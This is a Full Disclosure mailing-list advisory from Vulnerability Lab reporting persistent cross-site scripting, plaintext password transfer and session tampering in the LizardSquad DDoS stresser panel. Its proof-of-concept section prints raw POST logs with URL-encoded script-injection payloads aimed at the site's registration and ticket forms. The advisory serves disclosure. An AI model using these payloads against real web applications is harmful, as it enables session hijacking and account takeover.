Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

LizardSquad DDoS Stresser - Multiple Vulnerabilities

From: Vulnerability Lab <research () vulnerability-lab com>
Date: Wed, 21 Jan 2015 11:44:10 +0100
Document Title:
===============
LizardSquad DDoS Stresser - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1417

http://magazine.vulnerability-db.com/?q=articles/2015/01/20/lizardsquad-ddos-stresser-multiple-vulnerabilities-revealed-takeover-ddos#


Release Date:
=============
2015-01-20


Vulnerability Laboratory ID (VL-ID):
====================================
1417


Common Vulnerability Scoring System:
====================================
8.9


Product & Service Introduction:
===============================
The product, called Lizard Stresser is a stress tester that might let you see how your own network stands up to DDoS 
attacks, 
like the ones that interrupted the gaming networks for several days last week. DDoS attacks basically overload servers 
with 
massive amounts of bogus requests.

(Copy of the Homepage: https://lizardstresser.su/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official LizardSquad DDoS 
Stresser online-service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-01-20:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
LizardSquad
Product: DDoS Stresser - Web Application (Online-Service) 2015 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
Multiple web vulnerabilities has been discovered in the official LizardSquad `Stresser DDoS Service` web-application.

1.1
The 1st vulnerability is located in `username` value of the registration module. A user can register a script code as 
payload 
to the name values. The ddos web-service of the input on registration uses the wrong conditions to encode and parse. 
Thus allows 
to execute the injected script code in the `./ref` module of the service. The request method to inject is POST and the 
vulnerability is located on the application-side of the ddos stresser service. The main administrators are able to see 
the user 
passwords, by watching the logs of an compromised server you see that they can switch by login in through the 
registered user accounts. 
This is possible because of plain transfered passwords in the ddos application. The known event can be used to prepare 
malicious code 
that executes function in connection with application-side injected script codes. The vulnerable file to inject the 
code is the 
register.php file. Another execution of the injected script code occurs in the main dashboard (left sidebar) were the 
username 
is getting visible.

Vulnerable Module(s):
                                [+] Registration (./ref)

Vulnerable Parameter(s):
                                [+] username

Affected Module(s):
                                [+] Dashboard (Username in Left Sidebar)


1.2
The 2nd vulnerability is located in the Ticket Title & Ticket Content input fields of the `Tickets` (tickets) module. A 
fresh registered 
user account is able to inject own malicious persistent script code to the ticket input fields to exploit a backend 
administrator account. 
After an attacker registers and inject own script code to the ticket system he is able to get the ip of the backend 
users or can compromise 
the session data of moderators/administrators. The inject occurs in the `./tickets` module. The execution takes place 
locally in the listed 
open ticket items of the backend. Remote attackers are also able to access other tickets and stored information by 
intercepting the session 
of the add Ticket POST method request.

Vulnerable Module(s):
                                [+] Tickets (./tickets)

Vulnerable Parameter(s):
                                [+] name (servername)

1.3
The 3rd vulnerability is located in the target server `name` value. The attacker uses the device or servername to send 
malicious data to the 
ddos application control panel. A remote attacker can change the server or device name value to a script code payload 
that executes in the 
panel (server target list). The service syncs the the device/server name value after the infection but also if the 
attacker syncs the 
data manually. In case of usage macOS to attack it is possible to change the servername easily to a malicious script 
code payload that 
affects the ddos control panel.

Vulnerable Module(s):
                                [+] server list

Vulnerable Parameter(s):
                                [+] name (servername)

1.4
The 4th vulnerability is located in the `dasboard > user settings > change password` module. The data in the POST 
method to change the own 
account password is send in plain-text. Thus allows remote attackers and network administors to capture compromised 
accounts. The service can 
also be observed by man-in-the-middle attacks in the local network.

Vulnerable Module(s):
                                [+] dasboard > user settings > change password


1.5
The 5th vulnerability is also located in the `dasboard > user settings > change password` module. The POST method 
request of the change function in the 
ddos application can be intercepted by attackers to compromise the service. The remote attacker logs in as user and 
intercepts the session information by 
changing to an existing user account. Successul exploitation of the session tampering issues results in account system 
compromise (administrators/customers).

Vulnerable Module(s):
                                [+] dasboard > user settings > change password

Vulnerable Parameter(s):
                                [+] id


Proof of Concept (PoC):
=======================
1.1
--- PoC Session Logs [POST] (Injection) ---
Status: 200[OK]
POST http://lizardstresser.su/usercp Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] 
Mime Type[text/html]
   Request Header:
      Host[lizardstresser.su]
      User-Agent[Mozilla/5.0 

(Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer

[http://lizardstresser.su/usercp]
      Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
      Connection[keep-alive]
   POST-Daten:
      cpassword[chaos666]
      npassword[http%3A%2F

%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
      rpassword[http%3A%2F%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
      updatePassBtn[Change+Stored+Data%21]
   Response Header:
      Date[Tue, 20 Jan 2015 

10:29:21 GMT]
      Content-Type[text/html]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      

Pragma[no-cache]
      Server[cloudflare-nginx]
      CF-RAY[1aba972a06dd15b3-FRA]
      Content-Encoding[gzip]
-
Status: 302[Moved Temporarily]
POST https://lizardstresser.su/register.php 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[lizardstresser.su]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://lizardstresser.su/register.php]
      Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
      Connection[keep-alive]
   POST-Daten:
      username[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E2]
      password[chaos666]
      rpassword[chaos666]
      email[research%40vulnerbaility-lab.com]
      ref[%2F]
      checkbox1[1]
      register[Register]
   Response Header:
      Server[cloudflare-nginx]
      Date[Tue, 20 Jan 2015 11:20:02 GMT]
      Content-Type[text/html]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      Location[/purchase]
      CF-RAY[1abae168238f15b3-FRA]
      X-Firefox-Spdy[3.1]


Reference(s):
http://lizardstresser.su/?r=imgsrcx2020iframesrca20iframe
https://lizardstresser.su/register.php


1.2
--- PoC Session Logs [POST] (Injection) ---
Status: 200[OK]
POST http://lizardstresser.su/ajax/addticket.php 
Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[lizardstresser.su]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      X-Requested-With[XMLHttpRequest]
      Referer[http://lizardstresser.su/tickets]
      Content-Length[324]
      Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   POST-Daten:
      title2[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      code[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
content[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      hash[JMX02SbuIwklRiGPAVDgeOC5nTs41xFp]
   Response Header:
      Date[Tue, 20 Jan 2015 10:30:54 GMT]
      Content-Type[text/html]
Transfer-Encoding[chunked]
      Connection[keep-alive]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      Server[cloudflare-nginx]
  CF-RAY[1aba996d3d7115b3-FRA]
      Content-Encoding[gzip]

Reference(s):
http://lizardstresser.su/ajax/addticket.php


Credits & Authors:
==================
Vulnerability Laboratory [Research Team]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or 
its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special 
damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody 
to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - 
www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com                     - admin () 
evolution-sec com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - 
evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit 
our material contact 
(admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com
PGP KEY: http://www.vulnerability-lab.com/keys/admin () vulnerability-lab com%280x198E9928%29.txt



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: